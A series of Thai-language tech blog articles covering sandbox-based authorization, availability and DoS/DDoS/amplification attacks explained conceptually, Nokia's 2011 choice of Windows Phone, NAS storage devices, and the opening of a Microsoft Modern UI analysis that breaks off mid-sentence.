สิ่งเหล่านี้สร้างความเสียหายให้กับเครื่องได้ไม่ต่างจากซอฟต์แวร์เดสก์ทอป เพื่อให้เว็บเบราว์เซอร์สามารถรันโค้ดเหล่านั้นได้โดยยังปกป้องความปลอดภัยของผู้ใช้ แนวทางคือการให้ซอฟต์แวร์ที่ไม่น่าเชื่อถือเหล่านั้นรันด้วยสิทธิที่จำกัดอย่างมาก แล้วให้ขอสิทธิทีละอย่างเพิ่มจากผู้ใช้โดยตรง ตัวอย่างในภาพแสดงเมื่อโค้ดบนเบราว์เซอร์พยายามเก็บข้อมูลถาวรลงในเบราว์เซอร์ เบราว์เซอร์จะถามผู้ใช้ว่ายอมเปิดสิทธินี้ให้กับโค้ดของเว็บหรือไม่ หากไม่ยอมโค้ดก็จะไม่สามารถทำงานต่อไปได้ การให้สิทธิอย่างละเอียดทีละฟีเจอร์ของระบบ โดยตัวโค้ดไม่มีทางเข้าใช้ฟีเจอร์นั้นได้หากไม่ได้รับอนุญาตเรียกว่าการป้องกันแบบ sandbox เลียนแบบกระบะทราย ในระบบปฎิบัติการอุปกรณ์เคลื่อนที่รุ่นใหม่ๆ เช่น Android หรือ iOS ล้วนรันแอพพลิเคชั่นบน sandbox ของแต่ละแอพพลิเคชั่นทั้งสิ้น แต่ละแอพพลิเคชั่นจะสามารถเข้าถึงระบบปฎิบัติการได้อย่างจำกัดตามที่ขอสิทธิผู้ใช้ไว้ล่วงหน้าและจะไม่สามารถทำนอกเหนือจากสิทธิที่ขอไว้ ระบบปฎิบัติการรุ่นใหม่กว่านั้น เช่น Blackberry 10 เปิดให้ผู้ใช้เข้าจัดการสิทธิของแอพพลิเคชั่นได้ทุกเวลา เช่น เราอาจจะต้องการลงทะเบียน LINE ผ่านทาง SMS เมื่อติดตั้งครั้งแรก เราจึงต้องอนุญาตให้ LINE อ่าน SMS ในเครื่องได้ แต่เมื่อเวลาผ่านไป แอพพลิเคชั่น LINE กลับสามารถที่จะอ่าน SMS ของเราได้ตลอดเวลา การปิดสิทธิบางอย่างออกเมื่อต้องการจึงเพิ่มความปลอดภัยให้กับผู้ใช้ กูเกิลเองก็มีแผนที่จะเพิ่มความสามารถในการจัดการสิทธิของแอพพลิเคชั่นหลังจากติดตั้งไปแล้วในแอนดรอยด์ด้วยเช่นกัน ปัญหาความปลอดภัยจำนวนมากในช่วงหลังเกิดจากปัญหาความไม่มีประสิทธิภาพของระบบ sandbox แอพพลิเคชั่นที่มุ่งร้ายกลับสามารถเปลี่ยนแปลงข้อมูลในเครื่องได้มากกว่าที่กำหนด เช่น โค้ดจาวาสคริปต์บนเว็บนั้นเมื่อเราเปิดเบราว์เซอร์ขึ้นมา โดยพื้นฐานแล้วมันจะมีสิทธิจัดการกับเนื้อหาบนเว็บ สามารถติดต่อกลับไปยังเซิร์ฟเวอร์ที่เราดาวน์โหลดโค้ดนั้นเข้ามา แต่หาก sandbox มีช่องโหว่ โค้ดจาวาสคริปต์เหล่านี้ก็อาจจะเข้ามารันซอฟต์แวร์บนเดสก์ทอป เปลี่ยนแปลงไฟล์ที่เราไม่ได้อนุญาตได้ การสาธิตช่องโหว่ความปลอดภัยของ sandbox หลายครั้งจึงต้องการเพียงแค่การรันโปรแกรมเครื่องคิดเลขบนเดสก์ทอปก็นับว่าเป็นช่องโหว่ความปลอดภัยแล้ว ### ส่งท้าย กระบวนการให้อำนาจเป็นชิ้นส่วนสำคัญในระบบรักษาความปลอดภัยคอมพิวเตอร์ นับแต่การจำกัดการเข้าถึงทางภายภาพ มาจนถึงการให้อำนาจในระบบที่ใช้งานร่วมกันหลายคน และแม้แต่ระบบที่ใช้งานเพียงคนเดียวแต่กลับไม่ไว้ใจแอพพลิเคชั่นเช่นในอุปกรณ์เคลื่อนที่สมัยใหม่ก็ต้องมีการให้อำนาจเข้าเป็นส่วนประกอบสำคัญ ส่งท้ายรูปแบบการให้อำนาจที่ไม่เกี่ยวกับคอมพิวเตอร์ "[friendzoned](http://www.wikihow.com/Escape-the-Friend-Zone)"
# Availability: อยู่กับเธอเสมอ หลักการความปลอดภัยข้อหนึ่งที่ดูจะไม่เกี่ยวกับความปลอดภัยนัก คือ availability หรือสถานะพร้อมใช้งาน แม้ว่าแฮกเกอร์อาจจะไม่ได้ขโมยข้อมูลออกไปจากระบบ หรือทำลายข้อมูลสร้างความเสียหายโดยตรง แต่ทุกวันนี้เพียงแค่การทำให้ระบบไม่สามารถใช้งานได้โดยผู้ใช้ที่ถูกต้อง ก็สร้างความเสียหายได้มากมาย ระบบสำคัญอย่างสาธารณูปโภค เช่น ไฟฟ้า, โทรศัพท์, หรือน้ำประปา หากไม่สามารถใช้งานเพียงไม่กี่ชั่วโมง ความเสียหายอาจจะสูงจนคาดไม่ถึง ในโลกอินเทอร์เน็ต ธนาคารออนไลน์อาจจะถูกโจมตีจนกระทั่งไม่สามาถใช้งานได้สร้างความเสียหายให้กับลูกค้าของธนาคารและความน่าเชื่อถือของธนาคารเอง ### ช่องโหว่ซอฟต์แวร์ ช่องโหว่ซอฟต์แวร์ที่เป็นข่าว มักเป็นช่องโหว่ที่ทำให้ข้อมูลเสียหาย หรือรั่วไหลกลับไปยังแฮกเกอร์ได้ แต่ในหลายครั้งช่องโหว่อาจจะอยู่ในส่วนที่ไม่มีข้อมูลสำคัญ หรือมีกระบวนการป้องกันทำให้แม้จะทำงานผิดพลาดแต่ก็ไม่พอให้แฮกเกอร์เข้ามารันโค้ดได้ตามใจชอบ หรือดึงข้อมูลกลับไป แต่ยังสามารถทำให้บริการล่มลงได้ ตัวอย่างของช่องโหว่เหล่านี้ เช่น [ช่องโหว่แอพพลิเคชั่นอ่านเมลบนแอนดรอยด์](https://www.blognone.com/node/65852) หากมีความผิดพลาดในข้อมูลอีเมลส่วนฟิลด์ Content-Disposition จะทำให้แอพพลิเคชั่นแครชไปทันทีที่ตัวแอพพยายามดาวน์โหลดอีเมล ผลของช่องโหว่นี้ทำให้แฮกเกอร์สามารถส่งอีเมลไปยังเหยื่อเพื่อให้เหยื่อไม่สามารถอ่านอีเมลได้ ช่องโหวในตัวแอพพลิเคชั่นอาจจะไม่ได้สร้างความเสียหายเป็นวงกว้างนัก แต่ในเซิร์ฟเวอร์ก็มีช่องโหว่เหล่านี้ได้เช่นกัน ตัวอย่างเช่น [CVE-2014-9016](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9016) เป็นช่องโหว่ของ Drupal ที่รองรับรหัสผ่านที่ยาวมาก แต่กระบวนการตรวจสอบรหัสผ่านเหล่านี้กลับใช้หน่วยความจำและซีพียูที่สูงมาก ทำให้แฮกเกอร์สามารถใช้โปรแกรมล็อกอินจากเครื่องจำนวนไม่มากนัก แต่ทำให้เซิร์ฟเวอร์ล่มไปได้อย่างง่ายดาย ### DoS พายุอินเทอร์เน็ต กระบวนการโจมตีให้บริการไม่สามารถใช้งานมีความน่ากลัวสำคัญที่ไม่ได้ต้องการ "ช่องโหว่" ของซอฟต์แวร์เพื่อการโจมตีเสมอไป เนื่องจากการให้บริการทุกอย่างนั้นล้วนมีขีดจำกัดในตัวเอง กระบวนการทำให้บริการไม่สามารถให้บริการต่อไปได้จึงทำให้เซิร์ฟเวอร์ไม่สามารถให้บริการกับผู้ใช้จริงได้ เรียกว่า Denial of Service (DoS) การโจมตีแบบพื้นฐาน เช่น การเขียนสคริปต์ให้เปิดเว็บซ้ำไปเรื่อยๆ จนกว่าเซิร์ฟเวอร์จะไม่สามารถทำงานได้เป็นกระบวนการที่มีการใช้งานมานาน เจ้าของเซิร์ฟเวอร์เองก็มักจะทดสอบศักยภาพของเซิร์ฟเวอร์ด้วยแนวทางนี้เช่นกัน แม้จะทำได้ง่าย แต่การโจมตีแบบนี้ก็แก้ไขได้ง่าย ตัวเซิร์ฟเวอร์มักมีระบบป้องกันที่จะแบนหมายเลขไอพีต้นทางหากมีการเข้าใช้งานมากผิดปกติ การโจมตีในช่วงหลังจึงจำเป็นต้องใช้หมายเลขไอพีจำนวนมาก แล้วนัดหมายการให้เข้าใช้บริการพร้อมๆ กัน จนเซิร์ฟเวอร์ล่ม กระบวนการนี้ทำให้เซิร์ฟเวอร์ป้องกันตัวได้ยาก เพราะไม่สามารถแบนหมายเลขไอพีใดไอพีหนึ่งออกไปได้ หากแบนไอพีจำนวนมากผู้ใช้จริงก็มักจะถูกแบนออกไปด้วยพร้อมๆ กัน การโจมตีเช่นนี้เรียกว่า Distributed Denial of Service (DDoS) กระบวนการป้องกันการถูกโจมตีแบบ DDoS ต้องใช้เทคนิคขั้นสูง กระนั้นก็ยังมีความผิดพลาดได้เมื่อซอฟต์แวร์ตรวจสอบการโจมตีคาดการณ์ผิดว่าผู้ใช้ทั่วไปเป็นเครื่องที่เข้ามาโจมตีและบล็อคผู้ใช้ทั่วไปทำให้ใช้งานไม่ได้ บริการต่อต้านการโจมตีแบบ DDoS จึงมักเปิดช่องให้ผู้ที่ถูกบล็อค สามารถยืนยันตัวตนเพื่อใช้บริการต่อไปได้ เช่น บางครั้งเราอาจจะเข้าใช้งานกูเกิลแล้วพบว่ากูเกิลบอกให้เรายืนยันว่าเป็นมนุษย์ด้วยการกรอกช่อง Captcha อย่างไรก็ดี DDoS เองมักมีค่าใช้จ่ายในการโจมตีที่แพงพอสมควร คนร้ายต้องวางมัลแวร์ไว้ในเครื่องเหยื่อจำนวนมาก เรียกว่า Botnet เพื่อให้รอรับคำสั่งโจมตีจากศูนย์กลาง กระบวนการเช่นนี้มักมีค่าใช้จ่าย โดยกลุ่มผู้สร้างมัลแวร์และควบคุม Botnet จะให้บริการโจมตีตามคำสั่ง หรือซื้อขายศูนย์กลางควบคุมกันในตลาดมืด ค่าใช้จ่ายนี้ทำให้เซิร์ฟเวอร์โดยทั่วไปไม่ได้ถูกโจมตีแบบ DDoS บ่อยนัก การโจมตีอีกรูปแบบที่สำคัญคือการโจมตีแบบ Amplification ที่อาศัยกลไกการ "ปลอมไอพี" เป็นหลัก เนื่องจากมีบริการจำนวนมากในอินเทอร์เน็ตที่เปิดให้บริการเป็นสาธารณะ และผู้ให้บริการก็มักตอบกลับโดยไม่ได้ตรวจสอบอะไรมากนัก เช่น บริการ DNS, [NTP](https://blog.cloudflare.com/technical-details-behind-a-400gbps-ntp-amplification-ddos-attack/) และบริการอื่นๆ กระบวนการนี้คือผู้โจมตีจะอาศัยอยู่ใน ISP ที่ปล่อยให้มีการปลอมไอพีที่มาได้ แล้วปลอมไอพีเป็นเครื่องของเหยื่อ จากนั้นยิงคำร้องขอไปยังเซิร์ฟเวอร์ที่ให้บริการ ทั่วโลก เนื่องจาก ข้อมูลตอบกลับมักมีขนาดใหญ่กว่าข้อมูลร้องขอมาก ผู้โจมตีจึงใช้แบนวิดท์ไม่มากนักในการส่งคำร้องขอไปยังเซิร์ฟเวอร์ทั่วโลก แต่เมื่อเซิร์ฟเวอร์เหล่านั้นตอบกลับไปยังเครื่องของเหยื่อที่ไปพร้อมๆ กัน ปริมาณข้อมูลที่ถูกส่งกลับไปจะมหาศาลจนกระทั่งเครื่องของเหยื่อไม่สามารถทำงานได้ หรือบางครั้งอาจจะล่มไปทั้งผู้ให้บริการอินเทอร์เน็ตเนื่องจากแบนวิดท์เต็ม กระบวนการแก้ปัญหาเช่นนี้ต้องอาศัยความร่วมมือของ ISP จากนานาชาติ ติดไปกันเพื่อหาต้นตอของการโจมตี ทุกวันนี้ในวงการ ISP เองมีความพยายามกำหนดแนวทาง [BCP38](http://tools.ietf.org/html/bcp38) เพื่อให้ทุก ISP รับผิดชอบร่วมกันแก้ปัญหาการปลอมไอพีต้นทาง การดูแลบริการให้สามารถทำงานได้อย่างต่อเนื่องกลายเป็นประเด็นความมั่นคงปลอดภัยไซเบอร์ไปในทุกวันนี้ บริการต่างๆ ที่อาจจะต้องเตรียมมาตรการเพิ่มเติมในกรณีที่ถูกโจมตีเพื่อให้ "ให้บริการไม่ได้" ส่งท้าย คนโสดในภาษาอังกฤษ ก็เรียกว่า available ครับ
# [บทวิเคราะห์] ทำไมโนเกียไม่ทำ Android? คอมเมนต์ยาวไปหน่อย ก็เลยได้รับคำร้องขอให้เขียนเป็นบทวิเคราะห์ไปเสียให้จบๆ ไป บทวิเคราะห์นี้จะมุ่งเน้นตอบคำถามว่า เหตุใดโนเกียจึงตัดสินใจเลือก Windows Phone ในปี 2011 และไม่ทำ Android เลยหลังการตัดสินใจนั้นจนกระทั่งปัจจุบัน คำถามว่าทำไมไม่ทำ Android ก่อนหน้า 2011 นั้นไม่ได้รวมอยู่ในบทวิเคราะห์นี้ กำไรของโนเกียนั้นเริ่มลดลงครั้งแรกในปี 2007 หลังจากแอปเปิลเปิดตัว iPhone แล้วก็ทรุดหนักลงอย่างต่อเนื่อง พอย่างเข้าสิ้นปี 2010 กำไรของโนเกียก็ลดลงไปกว่า 30% เมื่อเทียบจากจุดสูงสุด จนในเดือนกุมภาพันธ์ 2011 Stephen Elop ก็เข้ารับตำแหน่งซีอีโอของโนเกีย Elop ออกเอกสารภายในฉบับหนึ่ง หลังรับตำแหน่ง ใจความสำคัญบางส่วนจากเอกสารนั้นคือ 1. สภาพการแข่งขันเป็นการแข่งโดย ecosystem ไม่ใช่ มือถือต่อมือถือ (device by device) อีกต่อไป 2. โนเกียทำ MeeGo ไม่ทัน ทำจนสิ้นปีก็อาจได้แค่รุ่นเดียว 3. Symbian มีปัญหาการพัฒนาภายใน เนื่องจากการเปลี่ยน requirement อย่างมาก การพยายามมุ่งเน้น Symbian ต่อไป จะยิ่งทำให้ไล่คู่แข่งไม่ทัน โนเกียต้องเลือกว่าจะสร้างแพลตฟอร์ม หรือจะเข้าร่วมแพลตฟอร์มอื่นๆที่มีอยู่แล้ว (ดูฉบับเต็มที่ [Engadget](http://www.engadget.com/2011/02/08/nokia-ceo-stephen-elop-rallies-troops-in-brutally-honest-burnin/)) อีกเดือนถัดมา โนเกียก็เซ็นสัญญาพันธมิตรกับไมโครซอฟท์ คำถามแรกที่ต้องถาม ณ จุดนี้ คือสถานการณ์เงินโนเกียเป็นอย่างไร? Bloomberg รายงานว่าในไตรมาสแรก ส่วนแบ่งการตลาดของโนเกียลดจาก 41% เหลือ 26% เงินสดรับจากการดำเนินงานลดจาก 1,181 ล้านยูโรเหลือเพียง 182 ล้านยูโร และผลประกอบการดำเนินงาน (operation profit) อยู่ที่ -173 ล้านยูโร เห็นได้ชัดว่า แม้ภายนอกยักษ์ใหญ่จากฟินแลนด์ยังไม่ออกอาการ แท้จริงเมาหมัดและออกอาการเป๋แล้ว Elop เขียนในแถลงการณ์ฉบับเดียวกันว่า "เราอยู่บนฐานที่ไฟกำลังไหม้" เงินสดโนเกียไหลออกไม่หยุด โนเกียไม่เหลือเงินสำหรับลงทุนอะไรอีกแล้วนอกจากเก็บไว้ เพื่อให้ธุรกิจเดินไปได้ "วันต่อวัน" ดูตรงนี้อีกที เราน่าจะเห็นได้ตรงกันว่า ไม่ว่าโนเกียจะเลือกทางไหน (Android vs Windows Phone) ฐานะการเงินของโนเกียน่าจะไม่เปลี่ยนไป เพราะโนเกียก็คงไม่มีทางออกมือถือใหม่ได้ในระหว่างหกเดือนนั้น ผลที่ออกมาจริงๆ คือเข้าไตรมาส 2 ปี 2011 โนเกียรายงานผลขาดทุน 384 ล้านยูโร, เดือน 6 โนเกียปลดพนักงาน Symbian, เดือน 9 ปิดโรงงานในโรมาเนีย, พอตกสิ้นปี โนเกียประกาศขายสำนักงานใหญ่เอาเงินมาหมุน สิ่งหนึ่งที่ยืนยันความย่ำแย่นี้ได้ คือแผนผังภายในเกี่ยวกับการเปลี่ยนแปลงการลงทุนของโนเกียเองที่แสดงให้เห็นชัดถึงการลดการลงทุนและโฟกัสมากขึ้น ทางเลือกของ โนเกียจึงชัดเจนว่าเอาเงินมาก่อนเพื่อให้บริษัทยังรอดได้ต่อไป โฟกัสทรัพยากรทั้งหมดที่เหลือ สร้างมือถือรุ่นเดียวให้ดี เลิกกั๊กสเปก และเลิกกั๊กทีมพัฒนาไปทำอย่างอื่น คำถามถัดมาคือเลือกอะไร? โนเกียมีทางเลือกหลักๆ คือ **1) ปั้นแพลตฟอร์มตัวเอง** ในทางเลือกนี้ โนเกียต้องเร่งพัฒนาทั้ง MeeGo และ Symbian รวมไปถึงสร้าง ecosystem ที่ตัวเองไม่เคยมี และก็ยังมีปัญหาว่าโนเกียมีทรัพยากรไม่พอ เราเห็นข่าวไมโครซอฟท์จ้างบริษัทอื่นทำแอพขึ้น Windows Store เป็นระยะๆ หรือแม้แต่โครงการรับประกันรายได้นักพัฒนา ของพวกนี้เป็นความฟุ่มเฟือยที่โนเกียในสภาพตกอับไม่มีทางทำได้ นี่เป็นสิ่งหนึ่งที่แทบจะเรียกว่าปิดประตูใส่หน้า MeeGo และ Symbian ไปเลยโดยปริยาย **2) Android หรือ Windows Phone** ตรงนี้เป็นหัวใจสำคัญ เราคงยอมรับได้ตรงกันว่า OS มือถือมีสองรายแรกยึดหัวหาดไว้แข็งแกร่งมากอยู่แล้ว ขั้วที่สามรอดยาก ขั้วที่สี่แทบไม่เหลือโอกาสรอด ถ้าโนเกียหนุน WP, WP จะมีโอกาสเป็นขั้วที่สาม ถ้าโนเกียหนุน MeeGo หรือ Symbian แปลว่าในทั้งสามตัว MeeGo, Symbian และ WP จะเหลือรอดแค่ตัวเดียว หรือไม่ก็ตายทั้งหมด ถ้าโนเกียไปกูเกิล กูเกิลก็คงไม่ดูดำดูดีมากนัก เพราะ Android ยืนเองได้แล้ว กูเกิลไม่ได้อยู่ในสถานะที่ต้องง้อโนเกีย ส่วน MeeGo กับ Symbian โนเกียต้องดันเองหมด และต้องสู้กับ Android/iOS ด้วย ในทางกลับกัน ไมโครซอฟท์เหมือนอยู่กลางทะเลทราย ไมโครซอฟท์ง้อโนเกียมาก โนเกียไม่ช่วย WP ตายแน่ ไมโครซอฟท์มีเงิน มีวิศวกร มีทุกอย่างยกเว้นคนทำมือถือ ข้อดีในการทำ Windows Phone เหนือกว่า Android ก็คือถ้าเราสมมุติว่าโนเกียไม่รู้เรื่อง OS อะไรเลย นับแต่เซ็นว่าจะใช้ WP ในเดือนมีนาคม 2011 จากนั้นโนเกียปล่อย Lumia ตัวแรก ใน 6 เดือนถัดมา สมมติต่อไปอีกว่าโนเกียจะใช้เวลาเท่าๆ กันในการทำ Lumia on Android จุดแตกต่างคือ ในขณะที่ Lumia WP ไม่มีคู่แข่งเลย ทุกรายมีความรู้เท่ากัน เริ่มจากศูนย์เหมือนกัน แต่ Lumia on Android จะลำบากกว่ามาก เมื่อ Samsung/HTC และคู่แข่งทุกรายทำขายมาตั้งแต่ 2009 โนเกียจะมีเวลาแค่ 6 เดือน ทำโทรศัพท์ Android ให้แข่งขันได้ ในโอเอสที่คนอื่นมีประสบการณ์ทำมาก่อนแล้ว 3 ปี! และพลาดไม่ได้เลย ถ้ายังขายไม่ออกอีกก็คงต้องปิดบริษัท Elop แถลงออกมาเร็วๆ นี้เองว่า โนเกียไม่มีที่ยืนในตลาด Android เพราะเขาไม่สามารถสร้างความแตกต่างจากคู่แข่ง (differentiate) ในระยะเวลาสั้นๆ ได้ ในขณะที่ WP มันแตกต่างด้วยตัวของมันเอง **3) ทำไมต้องเป็น WP เพียงอย่างเดียว?** ข้อนี้น่าจะเป็นคำถามคาใจ และน่าจะเป็นหนึ่งในคำถามที่เราต้องเดาเพราะคงไม่มีใครแถลงตรงๆ ผมประเมินคำตอบของคำถามข้อนี้ว่า 1. ไมโครซอฟท์ (น่าจะ) ใส่เงื่อนไขชัดแจ้งในข้อตกลง ไม่ให้โนเกียทำ Android เพื่อแลกกับเงินสนับสนุน 2. โนเกียไม่มีเงินและคนมากพอในการลงทุนมากกว่า 1 แพลตฟอร์ม 3. โนเกียไม่มีทางเลือกอื่น เพราะถ้าไม่รับเงินก็ตายสถานเดียว ดังนั้นดีล WP ไม่ใช่ดีลหอมหวานสำหรับโนเกีย มันเป็นดีลที่ "เสี่ยงน้อยที่สุด" ของบริษัทที่ไม่เหลือเงินจะเสี่ยงต่างหากดีลนี้ ฟื้นโนเกียมายิ่งใหญ่ไม่ได้ แต่ไม่ตาย ยังอยู่ได้ ความผิดพลาดของโนเกียคือไม่ทำ Android ในปี 2009-2010 แต่ดีล WP ใน 2011 ผมคิดว่าเขาตัดสินใจถูกต้อง เพราะมันช้าเกินกว่าจะไปวิ่งไล่รถที่ออกไปแล้ว โนเกียต้องเลือกรถคันใหม่ ที่อาจไม่เร็วเท่าของเก่า ไม่ใช่เพ้อฝันว่าจะวิ่งตามรถคันเก่าทัน โนเกียอาจกลับมาทำ Andriod หลังจากสัญญา 5 ปีกับไมโครซอฟท์หมดลง หรืออาจหันไปหาแพลตฟอร์มอื่นๆ หลังกระแสเงินสดเข้าที่ ซึ่งก็น่าจะเป็น Asha Platform อ้างอิง - [ReadWrite: Nokia/Microsoft Deal Confirmed: 5 Key Questions Answered](http://readwrite.com/2011/02/10/nokia_microsoft_deal_confirmed_5_key_questions#awesm=~obQdVLlHN6stlj) - [Engadget: Nokia CEO Stephen Elop rallies troops in brutally honest 'burning platform' memo?](http://www.engadget.com/2011/02/08/nokia-ceo-stephen-elop-rallies-troops-in-brutally-honest-burnin/) - [Wikipedia: Nokia Financial Difficulties and Restructuring](http://en.wikipedia.org/wiki/Nokia#Financial_difficulties_and_restructuring) - [Guardian: Nokia's revenue and profit trends point to its key problem: commoditisation](http://www.guardian.co.uk/technology/blog/2010/sep/10/nokia-profits-falling-explanation) - [Blognone: ฤดูขายตึก โนเกียขายสำนักงานใหญ่เพื่อระดมเงินสด](http://www.blognone.com/node/38707) - [Blognone: เผยข้อตกลงโนเกีย-ไมโครซอฟท์](http://www.blognone.com/news/22294/) - [Bloomberg: Nokia’s Handset Sales Slump May Cut Into $9 Billion Cash](http://www.bloomberg.com/news/2011-07-19/nokia-s-handset-sales-slump-may-cut-into-9-billion-cash-pile.html)
# มาทำความรู้จักกับ NAS ให้มากขึ้นกันเถอะ ยุคนี้สมัยนี้เป็นยุคดิจิทัล เราจะเก็บงาน เก็บหนัง เก็บเพลง หรือโปรแกรมต่างๆ ก็เก็บเป็นไฟล์ใส่ในฮาร์ดดิส ไว้ กันจนเกือบเต็มพื้นที่ไปหมด เป็นการดีส่วนหนึ่งคือเป็นการลดพื้นที่การจัดเก็บข้อมูล ไม่ต้องเก็บข้อมูลที่เป็นกระดาษ หรือเป็นสื่ออื่นๆ เช่น แผ่นฟลอปปี้ดิส, ซีดี, ดีวีดี โดยเปลี่ยนการจัดเก็บเป็นแท่งยูเอสบีแฟลชไดรฟ์ หรือใส่ในฮาร์ดดิสไปเลย ซึ่งปัจจุบันขนาดพื้นที่ฮาร์ดดิส 80GB หรือ 160GB ก็แทบจะไม่พอใช้กัน เก็บกันทั้งหนัง เกมส์ ซีรีย์(เกาหลี) และอื่นๆ อีกมากมาย หลายคนจึงเริ่มมองหาฮาร์ดดิสตัวใหม่เข้ามาเพิ่ม ซึ่งในปัจจุบันนี้ก็มีหลากหลายรูปแบบในเลือก ไม่ว่าจะเป็นฮาร์ดดิสก์แบบต่อภายใน ฮาร์ดดิสก์ต่อภายนอก และอีกทางเลือกหนึ่งคือ NAS หรือ Network Attached Storage ซึ่งมองแค่ภายนอกมันก็คล้ายฮาร์ดดิสก์ภายนอกตัวหนึ่ง จะว่าคล้ายก็ไม่ถูกนัก เพราะจริงๆ แล้วก็เป็นฮาร์ดดิสก์ต่อภายนอกตัวหนึ่งแต่มันมีคุณสมบัติเพิ่มขึ้นมามากกว่าเดิมนัก NAS หรือ Network Attached Storage นั้น เป็นอุปกรณ์ที่มีระบบต่างๆ เพิ่มเข้ามาจากเดิมที่มีแค่สายยูเอสบี หรือไฟร์ไวร์ ต่อกับเครื่องคอมพิวเตอร์โดยตรง แต่ NAS มีสายแลนหรืออาจเป็นสัญญาณไวไฟเป็นตัวเชื่อมต่อ ประโยชน์คือสามารถใช้งานร่วมกันหลายๆ คนได้ทันที ไม่จำเป็นต้องเปิดเครื่องคอมพิวเตอร์ทิ้งไว้เพื่อแชร์ข้อมูล (เปลืองไฟ) เปิดแค่ NAS ทิ้งไว้เท่านั้น ซึ่งประหยัดไฟกว่ามาก NAS นั้นเปรียบเสมือนกับว่าเป็นระบบไฟล์เซิร์ฟเวอร์ขนาดใหญ่ มีการเข้าถึงทำงานแบบไฟล์บนเซิร์ฟเวอร์โดยไคลเอ็นต์ หรือเวิร์กสเตชันผ่านทางเน็ตเวิร์กโพรโตคอลเช่น TCP/IP และผ่านทางแอพพลิเคชันเช่น NFS (Network File System) หรือ CIFS (Common Internet File System) ทำให้ไคลเอ็นต์ที่เชื่อมต่ออยู่บนระบบเน็ตเวิร์กสามารถแลกเปลี่ยนไฟล์กันได้ และการเข้าถึงไฟล์ข้อมูลนั้น ส่วนใหญ่จะเป็นการเชื่อมต่อซึ่งมีอยู่ภายในไคลเอ็นต์อยู่แล้ว โดยโครงสร้างของ NAS นั้นเน้นการให้บริการด้านไฟล์ ดังนั้นจึงช่วยให้การจัดการเข้าถึงไฟล์สามารถทำได้ด้วยความรวดเร็ว และนอกจากนี้ผู้ใช้สามารถตั้งโปรแกรมให้ NAS แบ็กอัพไดเรกทอรีหรือฮาร์ดดิสก์ของไคลเอ็นต์ได้โดยอัตโนมัติ ซึ่งเป็นคุณสมบัติที่ดีอย่างหนึ่งที่ช่วยในการสำรองข้อมูลที่ลดความเสี่ยงในการสูญเสียข้อมูลให้น้อยลง NAS นั้นมีความสำคัญเป็นอย่างมากสำหรับการแชร์ไฟล์ เช่น NFS ในยูนิกซ์ หรือ CIFS ในวินโดวส์ เอ็นที โดยสามารถส่งไฟล์ข้อมูลไปให้กับหลายๆ ไคลเอ็นต์ โดยที่มีการป้องกันในเรื่องความปลอดภัยได้ ตัวอย่างที่เห็นได้ชัดของแอพพลิเคชันที่ควรใช้ NAS เพื่อประสิทธิภาพการทำงานมี 2 แอพพลิเคชันคือ ระบบไดเรกทอรี่และเว็บเซิร์ฟเวอร์ โดยทั้งสองแอพพลิเคชันนี้มีการดึงข้อมูลเพื่อนำไปใช้ แจกจ่าย หรือไปสร้างเว็บเพจนั้นเองและสำหรับในองค์กรที่มีการใช้ฐานข้อมูล มีการเข้าถึงข้อมูลแบบอ่านอย่างเดียว (จำกัดสิทธิ์) มีผู้ใช้งานน้อย ระบบ NAS จะสามารถช่วยการลดค่าใช้จ่ายขององค์กรแบบนี้ลงได้เช่นกัน นอกจากคุณสมบัติหลัก ๆที่กล่าวมาแล้ว NAS กับการพัฒนาอย่างต่อเนื่องจนทำให้มันมีคุณสมบัติต่าง ๆ มากมายซึ่งสามารถ เช่น - เป็น Multimedia Server สำหรับเก็บและแชร์ไฟล์เพลง รูปถ่าย หนัง ใช้งานร่วมกับ DMA รวมทั้งเครื่อง PS3 และ Xbox360 - จัดการระบบและเข้าถึงข้อมูลได้จากทุกที่ผ่านทางอินเตอร์เน็ต - ใช้เป็น print server, web server และ mail server สำหรับสำนักงานได้ - USB copy - USB Backup เพื่อใช้สำรองข้อมูลร่วมกับ External Hard - Download ข้อมูลได้โดยไม่ต้องเปิดคอมพิวเตอร์ รองรับ BitTorrent, FTP, HTTP, NZB, และ eMule - รองรับการทำงานแบบ Standard, JBOD, RAID 0, RAID 1 - รองรับการใช้งานได้หลาย ๆผู้ใช้งานพร้อมกัน NAS แต่ละตัวความสามารถอาจไม่เท่ากันขึ้นอยู่กับราคาและรุ่นนะครับ อันนี้ก็ต้องเลือกพิจารณากันเอาเอง แต่ผมว่าเจ้า NAS จะต้องเข้าไปอยู่ในใจของใครหลายคนแล้วแน่เลยครับ เครดิต COMPUTER TODAY MAG ที่มา [Compnetworking](http://compnetworking.about.com/od/itinformationtechnology/l/aa070101a.htm), [Arip](http://www.arip.co.th/news.php?id=407798)
# บทวิเคราะห์ : รหัสลับของ Microsoft ในยุคของ Modern-Style ครองอาณาจักร สวัสดีครับ วันนี้มาตามคำสัญญาที่จะนำบทวิเคราะห์แบบเจาะลึกในเรื่องรหัสลับของ Microsoft ที่อยู่ในช่วงที่ Modern-style UI ครองก๊กของ Microsoft ซึ่งบทวิเคราะห์นี้มาจากสายตาของผมทั้งหมด บางท่านอาจจะเชื่อหรือไม่ก็ได้ แต่ส่วนมากมักจะไม่มีข่าวตอนเปิดตัว และก็พึ่งมีข่าวตอนที่ Microsoft ประกาศแล้ว เพื่อไม่ให้เสียเวลาก็เข้าสู่บทวิเคราะห์กันเลยดีกว่า ### Windows Phone 7.5 เริ่มต้นผมก็ขอย้อนไปไกลสักเล็กน้อยในช่วงที่ Microsoft เตรียมปล่อย Windows Phone อัพเดต Mango (Windows Phone 7.5) ซึ่งทาง Microsoft ได้ปล่อยวิดีโอมายั่วน้ำลายผู้ใช้ Windows Phone ณ ช่วงนั้นดังวิดีโอต่อไปนี้ จะสังเกตว่า Microsoft แอบเปลี่ยนโลโก้ Windows Phone ตอนต้นและตอนท้ายของวิดีโอ (ซึ่งตอนนั้นใช้โลโก้กลม ๆ สีเขียวอยู่) แล้วก็พึ่งมีข่าวหลุดตอน 